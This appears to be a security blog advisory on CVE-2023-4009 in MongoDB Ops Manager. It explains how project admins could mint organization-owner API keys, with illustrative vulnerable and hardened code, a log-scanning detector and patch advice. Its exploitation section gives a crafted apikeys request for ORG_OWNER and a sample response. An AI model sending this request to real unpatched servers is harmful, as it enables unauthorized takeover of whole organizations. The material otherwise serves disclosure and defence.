Published: June 2024  
Severity: High  
Affected Products:

MongoDB Ops Manager v5.0 before 5.0.22
MongoDB Ops Manager v6.0 before 6.0.17

MongoDB Ops Manager is a widely used tool for managing MongoDB deployments, backups, and automation. In mid-2023 a privilege escalation flaw was disclosed: CVE-2023-4009. It allows a user with only *project-level* admin rights (Project Owner or Project User Admin) to escalate to Organization Owner, which means a user with limited rights inside one project could take over every project in the organization.

In this article, we’ll walk you through what the bug is, how it works, an example exploit, and how to protect your systems.

What’s the Issue?

In vulnerable versions of MongoDB Ops Manager (5.0 before 5.0.22 and 6.0 before 6.0.17), the Project Owner and Project User Admin roles are meant to grant administrative rights inside a single project only. Because of a bug in API key management, a user holding one of these roles could get Ops Manager to issue an API key carrying the *Organization Owner* role.

That means a project-level admin escalates to control of every project and deployment managed under the organization.

References:
- MongoDB Advisory: CVE-2023-4009 (requires a MongoDB account to view)
- NIST NVD: CVE-2023-4009

Technical Details

The flaw lies in the *API key generation* process. Project-level admins can legitimately create API keys for automating tasks within their own project. Faulty role checking let them request organization-level keys with roles higher than their own (such as ORG_OWNER).

The server honoured the role named in the request body instead of bounding it by the roles the caller actually held. With a carefully crafted request, Ops Manager would therefore issue an API key carrying ORG_OWNER to a caller who only owned a project.
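To make the bug class concrete, here is an added example (not MongoDB's Ops Manager source, and not code from the original post) that models the two authorization strategies side by side: a vulnerable `create_api_key_vulnerable` that stores whatever roles the request body names, and a hardened `create_api_key_hardened` that uses the caller's own organization-level role as the ceiling. The function names, the `Caller` class and the sample users are assumptions for the demonstration; ORG_OWNER is the role from the advisory, GROUP_OWNER and GROUP_USER_ADMIN are the API names for Project Owner and Project User Admin, and the other organization role names follow the Ops Manager API vocabulary. The hardened rule is this example's policy, not a claim about the exact change MongoDB shipped.

```python
"""Model of the authorization bug described above: trusting the role named in
the request body instead of bounding it by the caller's own privileges.

Added example code, not MongoDB Ops Manager source.  Function names, the
Caller class and the sample users are assumptions made for the demonstration.
"""
from dataclasses import dataclass, field


class PrivilegeError(Exception):
    """Raised when a caller asks for more than their own role allows."""


# Organization-level roles, ranked so that a higher number means more power.
ORG_ROLE_RANK = {
    "ORG_READ_ONLY": 0,
    "ORG_MEMBER": 1,
    "ORG_GROUP_CREATOR": 2,
    "ORG_OWNER": 3,
}

# Project-level roles that count as "administrator" inside one project.
PROJECT_ADMIN_ROLES = {"GROUP_OWNER", "GROUP_USER_ADMIN"}


@dataclass
class Caller:
    username: str
    org_roles: set = field(default_factory=set)        # roles held at organization level
    project_roles: dict = field(default_factory=dict)  # project id -> set of project roles


def create_api_key_vulnerable(caller, org_id, requested_roles, desc=""):
    """Vulnerable pattern: any administrator may create a key, and the roles
    stored on the key are whatever the request body asked for."""
    is_admin = bool(caller.org_roles) or any(
        roles & PROJECT_ADMIN_ROLES for roles in caller.project_roles.values())
    if not is_admin:
        raise PrivilegeError(f"{caller.username} is not an administrator")
    # BUG: requested_roles comes straight from the client and is never
    # compared with the roles the caller actually holds.
    return {"orgId": org_id, "desc": desc, "roles": sorted(requested_roles)}


def create_api_key_hardened(caller, org_id, requested_roles, desc=""):
    """Hardened pattern: the caller's own organization-level role is the
    ceiling for any role the new key may carry."""
    unknown = set(requested_roles) - set(ORG_ROLE_RANK)
    if unknown:
        raise ValueError(f"unknown organization roles: {sorted(unknown)}")
    # Project roles are scoped to one project and grant nothing at org level,
    # so a Project Owner with no org role cannot mint organization keys at all.
    if not caller.org_roles:
        raise PrivilegeError(f"{caller.username} holds no organization-level role")
    ceiling = max(ORG_ROLE_RANK[r] for r in caller.org_roles)
    too_high = [r for r in requested_roles if ORG_ROLE_RANK[r] > ceiling]
    if too_high:
        raise PrivilegeError(f"{caller.username} may not grant {too_high}")
    return {"orgId": org_id, "desc": desc, "roles": sorted(requested_roles)}


# Constructed sample users.
PROJECT_ADMIN = Caller("mallory", project_roles={"proj-a": {"GROUP_OWNER"}})
ORG_MEMBER = Caller("bob", org_roles={"ORG_MEMBER"})
ORG_OWNER = Caller("alice", org_roles={"ORG_OWNER"})


def demo():
    """Run both implementations against the escalation attempt from the text
    and return each outcome as a short string for side-by-side comparison."""
    results = {}
    for name, fn in (("vulnerable", create_api_key_vulnerable),
                     ("hardened", create_api_key_hardened)):
        try:
            key = fn(PROJECT_ADMIN, "org-1", ["ORG_OWNER"], desc="Evil org owner key")
            results[name] = "granted " + ",".join(key["roles"])
        except PrivilegeError as exc:
            results[name] = f"rejected ({exc})"
    return results


if __name__ == "__main__":
    for impl, outcome in demo().items():
        print(f"{impl:10s}: {outcome}")
```

The hardened version also rejects an ORG_MEMBER asking for ORG_OWNER while still letting that member create a lower-privileged ORG_READ_ONLY key, which is the behaviour you want: the check is relative to what the caller holds, not a blanket ban on the endpoint.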

Exploitation Example

Let’s step through a hypothetical attack, highlighting the code and API calls involved.

The Faulty API Call

You can use a tool like curl or Postman to send a POST request to the endpoint that creates organization API keys. The request below is illustrative: the real Ops Manager public API authenticates with HTTP Digest using an API key pair rather than a bearer token, but the JSON body is the part that matters.

Example vulnerable request

POST /api/public/v1.0/orgs/<orgId>/apikeys HTTP/1.1
Host: <ops-manager-host>:<port>
Authorization: Bearer <your_session_token>
Content-Type: application/json

{
  "desc": "Evil org owner key",
  "roles": ["ORG_OWNER"]
}

What should happen: the server should compare the requested roles against the roles you actually hold and reject anything above your own level.  
What happens: the server accepts "ORG_OWNER" as a role even though you only administer a single project.

If the server is vulnerable, it replies with something like:

{
  "id": "5f4e8a8d7f184f3e8f123456",
  "desc": "Evil org owner key",
  "roles": ["ORG_OWNER"],
  "publicKey": "<generatedPublicKey>",
  "privateKey": "<generatedPrivateKey>"
}

You now have an API key with org-wide administrative control!

Story in Simple Terms

Imagine you’re allowed to make keys for your apartment mailbox. By mistake, the building’s system lets you order a master key for every door—even though you’re just a tenant. That’s what happened here, digitally.

Impact of a key carrying ORG_OWNER:

- Full access to all projects in the organization.
- Ability to create/delete projects, users, clusters, and API keys.

For Defenders: How to Detect Attack Attempts

Check your Ops Manager access and audit logs for POST requests to /api/public/v1.0/orgs/<orgId>/apikeys whose JSON body contains "roles": ["ORG_OWNER"] and that come from accounts which are not organization owners. A successful (2xx) response on an unpatched server means a key was actually issued and must be found and revoked; a rejected request on a patched server still records an attempt worth investigating. Also list the organization's existing API keys and review every one that carries ORG_OWNER.
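The detection logic above, run over constructed sample log lines, as an added example that is not part of the original post and is not MongoDB tooling. The JSON-lines format, its field names, the organization-owner table and the sample events are all constructed for this demonstration; map them onto whatever your Ops Manager access or audit log actually emits before relying on the logic. The path pattern follows the public API endpoint used in the request shown earlier.

```python
"""Scan constructed Ops Manager-style access log lines for organization API
key creations that name ORG_OWNER but come from accounts that do not own the
organization.

Added example code, not part of the original post and not MongoDB tooling.
The log format, field names and sample events are constructed for this
demonstration.
"""
import json
import re

# Organization API key endpoint; the org id is a 24-character hex ObjectId.
ORG_APIKEYS_PATH = re.compile(
    r"^/api/public/v1\.0/orgs/(?P<org>[0-9a-f]{24})/apikeys/?$")

# Constructed: who legitimately owns each organization.
ORG_OWNERS = {"64c1f0a1b2c3d4e5f6a7b8c9": {"alice"}}

# Constructed sample events, one JSON object per line.  Lines 2 and 5 are the
# attack: a project admin ("mallory") asking for an ORG_OWNER key, once
# succeeding (unpatched server) and once being rejected (patched server).
SAMPLE_LOG = """
{"ts": "2023-08-09T10:00:01Z", "user": "alice",   "method": "POST", "path": "/api/public/v1.0/orgs/64c1f0a1b2c3d4e5f6a7b8c9/apikeys", "status": 201, "body": {"desc": "ci key", "roles": ["ORG_OWNER"]}}
{"ts": "2023-08-09T10:02:17Z", "user": "mallory", "method": "POST", "path": "/api/public/v1.0/orgs/64c1f0a1b2c3d4e5f6a7b8c9/apikeys", "status": 201, "body": {"desc": "Evil org owner key", "roles": ["ORG_OWNER"]}}
{"ts": "2023-08-09T10:03:40Z", "user": "mallory", "method": "GET",  "path": "/api/public/v1.0/orgs/64c1f0a1b2c3d4e5f6a7b8c9/apikeys", "status": 200, "body": null}
{"ts": "2023-08-09T10:05:12Z", "user": "mallory", "method": "POST", "path": "/api/public/v1.0/groups/64c1f0a1b2c3d4e5f6a7b8d0/apikeys", "status": 201, "body": {"desc": "project key", "roles": ["GROUP_OWNER"]}}
{"ts": "2023-08-10T08:15:33Z", "user": "mallory", "method": "POST", "path": "/api/public/v1.0/orgs/64c1f0a1b2c3d4e5f6a7b8c9/apikeys", "status": 403, "body": {"desc": "try again", "roles": ["ORG_OWNER"]}}
""".strip().splitlines()


def classify(event, org_owners):
    """Return an alert dict for one parsed event, or None if it is benign."""
    if event.get("method") != "POST":
        return None
    match = ORG_APIKEYS_PATH.match(event.get("path", ""))
    if not match:
        return None  # project-level key endpoints are not in scope here
    roles = (event.get("body") or {}).get("roles") or []
    if "ORG_OWNER" not in roles:
        return None
    org = match.group("org")
    user = event.get("user", "<unknown>")
    if user in org_owners.get(org, set()):
        return None  # an org owner minting an owner key is expected
    succeeded = 200 <= int(event.get("status", 0)) < 300
    return {
        "ts": event.get("ts"),
        "user": user,
        "org": org,
        "status": event.get("status"),
        "outcome": "succeeded" if succeeded else "rejected",
        "severity": "critical" if succeeded else "high",
    }


def scan(lines, org_owners=ORG_OWNERS):
    """Parse JSON-lines log records and return the list of alerts in order."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; count or log it in production
        alert = classify(event, org_owners)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"[{a['severity']}] {a['ts']} {a['user']} requested an ORG_OWNER key "
              f"in org {a['org']} -> {a['outcome']} (HTTP {a['status']})")
```

A succeeded alert means a key now exists and the follow-up is to enumerate the organization's API keys and revoke it; a rejected alert is still an indicator that an account is probing for this escalation.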

References

- CVE-2023-4009 Official NVD Entry
- MongoDB Security Advisories
- Ops Manager Documentation

Summary

CVE-2023-4009 is a major privilege escalation bug in MongoDB Ops Manager. It allows project admins to become full organization owners by generating API keys with excessive privileges. Upgrade to 5.0.22 / 6.0.17 or later as soon as you can, and audit existing organization API keys for any that should not exist. Don't let this bug turn a simple project user into the king of your database kingdom!

If you found this post useful, please share it with your team to keep everyone safe.


Stay secure!  
*Written exclusively for you – June 2024*

Timeline

Published on: 08/08/2023 09:15:00 UTC
Last modified on: 08/14/2023 16:32:00 UTC